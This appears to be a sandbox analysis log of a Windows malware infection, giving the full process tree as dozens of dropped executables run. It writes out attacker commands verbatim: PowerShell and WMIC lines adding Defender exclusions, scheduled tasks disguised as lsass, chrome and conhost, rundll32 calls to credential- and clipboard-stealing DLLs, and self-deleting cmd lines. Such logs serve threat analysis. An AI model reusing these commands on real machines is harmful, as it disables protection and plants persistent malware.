"C:\Users\Admin\AppData\Local\Temp\Files\RDX.exe"
2⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"
2⤵
PID:2400

C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe
"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"
2⤵
PID:8168

C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild.exe"
2⤵
PID:7816

C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
2⤵
PID:8956

C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Nvokcuobkn.exe"
2⤵
PID:2200

C:\Users\Admin\AppData\Local\Temp\Files\Fullwork123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Fullwork123.exe"
2⤵
PID:6556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1456

C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe
"C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"
2⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\Files\sc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sc.exe"
2⤵
- Launches sc.exe
PID:2068

C:\Users\Admin\AppData\Local\Temp\Files\chckik.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chckik.exe"
2⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Setup2010u32.exe"
2⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe"
2⤵
PID:5128

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
2⤵
PID:7868

C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Akh.exe"
2⤵
PID:4848

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
3⤵
PID:2536

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
3⤵
PID:6420

C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe
"C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe"
2⤵
PID:6976

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
3⤵
PID:2880

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
3⤵
PID:7296

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
PID:5980

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
4⤵
- Creates scheduled task(s)
PID:7288

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\Files\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
3⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
2⤵
PID:8900

C:\Users\Admin\AppData\Local\Temp\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
2⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe
"C:\Users\Admin\AppData\Local\Temp\Files\EchoNavigator.exe"
2⤵
PID:3948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nologo -noprofile -noninteractive -executionpolicy bypass -command .\serverBrowser.ps1
3⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\Files\Cvdnacb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Cvdnacb.exe"
2⤵
PID:9064

C:\Users\Admin\AppData\Local\Temp\Files\pt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pt.exe"
2⤵
PID:1648

C:\Windows\system32\cmd.exe
"cmd" /C tasklist
3⤵
PID:7360

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:3852

C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AppGate2103v01.exe"
2⤵
PID:3156

C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe"
2⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\onefile_4920_133571333056575945\stub.exe
"C:\Users\Admin\AppData\Local\Temp\Files\juditttt.exe"
3⤵
PID:8916

C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe
"C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe"
2⤵
PID:2484

C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe
"C:\Users\Admin\AppData\Local\Temp\Files\dais123.exe"
2⤵
PID:1848

C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Retailer_prog.exe"
2⤵
PID:1576

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2692

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4536

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 6 /tr "'C:\Windows\security\cap\chrome.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chrome" /sc ONLOGON /tr "'C:\Windows\security\cap\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "chromec" /sc MINUTE /mo 10 /tr "'C:\Windows\security\cap\chrome.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2376

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1128

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
PID:5032

C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
2⤵
PID:6676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6768

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6816

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
PID:6932

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
PID:6956

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:5196

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:6336

C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
"C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
2⤵
PID:6164

C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
"C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
2⤵
PID:3364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5448

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5836

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
2⤵
PID:6352

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
3⤵
- Creates scheduled task(s)
PID:6692

C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"
2⤵
PID:6524

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6524 -s 800
3⤵
- Program crash
PID:5312

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
2⤵
PID:6680

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
3⤵
PID:6796

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:7128

C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe
"C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe"
2⤵
PID:5496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 784
3⤵
- Program crash
PID:6900

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
"C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
2⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe
"C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe"
2⤵
PID:5000

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
2⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
2⤵
PID:2852

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
3⤵
PID:6820

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:2192

C:\Users\Admin\Pictures\haJbG9FpGg6AUJ9ALQ9VyGHI.exe
"C:\Users\Admin\Pictures\haJbG9FpGg6AUJ9ALQ9VyGHI.exe"
4⤵
PID:6348

C:\Users\Admin\Pictures\UooU08WzN4vIB832ype3jXB0.exe
"C:\Users\Admin\Pictures\UooU08WzN4vIB832ype3jXB0.exe"
4⤵
PID:1904

C:\Users\Admin\AppData\Local\Temp\7zSACA1.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:5064

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:8304

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:8308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:4628

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:9172

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe\" mP /IEsite_idSMA 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:9052

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
6⤵
PID:3856

C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
"C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe" --silent --allusers=0
4⤵
PID:3528

C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6a56e1d0,0x6a56e1dc,0x6a56e1e8
5⤵
PID:7928

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\umPlEK4aziY8EEGcrfHzzB0q.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\umPlEK4aziY8EEGcrfHzzB0q.exe" --version
5⤵
PID:7796

C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
"C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3528 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409103325" --session-guid=0abe6b48-da5d-4bec-969b-1f0a82badb78 --server-tracking-blob="MGJmYTVkMGJlZWUwZjY4NDBjYzkzZmQwYzkyMWVlYWRkZmI2NzJmYWRhMjRjNWNkYTJiZTY5NDVlODc1NWEzMjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNjU4NzgzLjY4MDYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjY0NzZkZWMtNjMzMC00MTlmLWI1NDgtMDQ5MDlkZTg0N2I1In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C04000000000000
5⤵
PID:3400

C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe
C:\Users\Admin\Pictures\umPlEK4aziY8EEGcrfHzzB0q.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2ac,0x2b0,0x2b4,0x27c,0x2b8,0x698de1d0,0x698de1dc,0x698de1e8
6⤵
PID:6968

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
5⤵
PID:9004

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe" --version
5⤵
PID:6952

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404091033251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xb80040,0xb8004c,0xb80058
6⤵
PID:6868

C:\Users\Admin\Pictures\jCZs626MNMXVHotE1cLv75ff.exe
"C:\Users\Admin\Pictures\jCZs626MNMXVHotE1cLv75ff.exe"
4⤵
PID:5200

C:\Users\Admin\AppData\Local\Temp\7zSAEB5.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:7944

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
6⤵
PID:8612

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
PID:5344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:5072

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
9⤵
PID:8080

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 10:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe\" mP /IEsite_idSMA 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:5504

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bgNHpsssZstYPMxCCI"
6⤵
PID:7180

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "eMHQCETsWPnVYjMqf" /SC once /ST 05:57:28 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\GlgcQoiPCSwQOyx\FzRWhuL.exe\" fx /MMsite_idmOX 385118 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:2220

C:\Users\Admin\Pictures\tbgIZBm1nG4rugHFew3oeeyZ.exe
"C:\Users\Admin\Pictures\tbgIZBm1nG4rugHFew3oeeyZ.exe"
4⤵
PID:6884

C:\Users\Admin\Pictures\GJPsrDlzzfkLrin4VhPrJPgr.exe
"C:\Users\Admin\Pictures\GJPsrDlzzfkLrin4VhPrJPgr.exe"
4⤵
PID:3300

C:\Users\Admin\AppData\Local\Temp\u2jo.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2jo.0.exe"
5⤵
PID:1376

C:\Users\Admin\AppData\Local\Temp\u2jo.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2jo.1.exe"
5⤵
PID:7360

C:\Users\Admin\Pictures\wqrKyeRNaNr3JIm7s872hUX2.exe
"C:\Users\Admin\Pictures\wqrKyeRNaNr3JIm7s872hUX2.exe"
4⤵
PID:1464

C:\Users\Admin\Pictures\hODpRzFYkj7FPnnkbvEi4nOL.exe
"C:\Users\Admin\Pictures\hODpRzFYkj7FPnnkbvEi4nOL.exe"
4⤵
PID:6176

C:\Users\Admin\Pictures\jcQNl4xPAYx8rgrl7pVAVz6t.exe
"C:\Users\Admin\Pictures\jcQNl4xPAYx8rgrl7pVAVz6t.exe"
4⤵
PID:6852

C:\Users\Admin\Pictures\YP5Uep8ezHwfoTicF3GDVPog.exe
"C:\Users\Admin\Pictures\YP5Uep8ezHwfoTicF3GDVPog.exe"
4⤵
PID:5472

C:\Users\Admin\AppData\Local\Temp\7zS2E8E.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:5068

C:\Users\Admin\Pictures\nQesDUtDlOpXjcbDD2DVHZvC.exe
"C:\Users\Admin\Pictures\nQesDUtDlOpXjcbDD2DVHZvC.exe"
4⤵
PID:8528

C:\Users\Admin\Pictures\xwpIL4LjXbcSHlCTUHLAlBkU.exe
"C:\Users\Admin\Pictures\xwpIL4LjXbcSHlCTUHLAlBkU.exe"
4⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\7zSE8A6.tmp\Install.exe
.\Install.exe /dQndidvBp "385118" /S
5⤵
PID:6656

C:\Users\Admin\Pictures\EktWUUboOFSQDEnPu10UMAVI.exe
"C:\Users\Admin\Pictures\EktWUUboOFSQDEnPu10UMAVI.exe"
4⤵
PID:4596

C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe
"C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe" --silent --allusers=0
4⤵
PID:1720

C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe
C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x67dce1d0,0x67dce1dc,0x67dce1e8
5⤵
PID:8072

C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe
"C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe"
2⤵
PID:6544

C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe"
2⤵
PID:1380

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:8396

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:8984

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe mP /IEsite_idSMA 385118 /S
1⤵
PID:9116

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
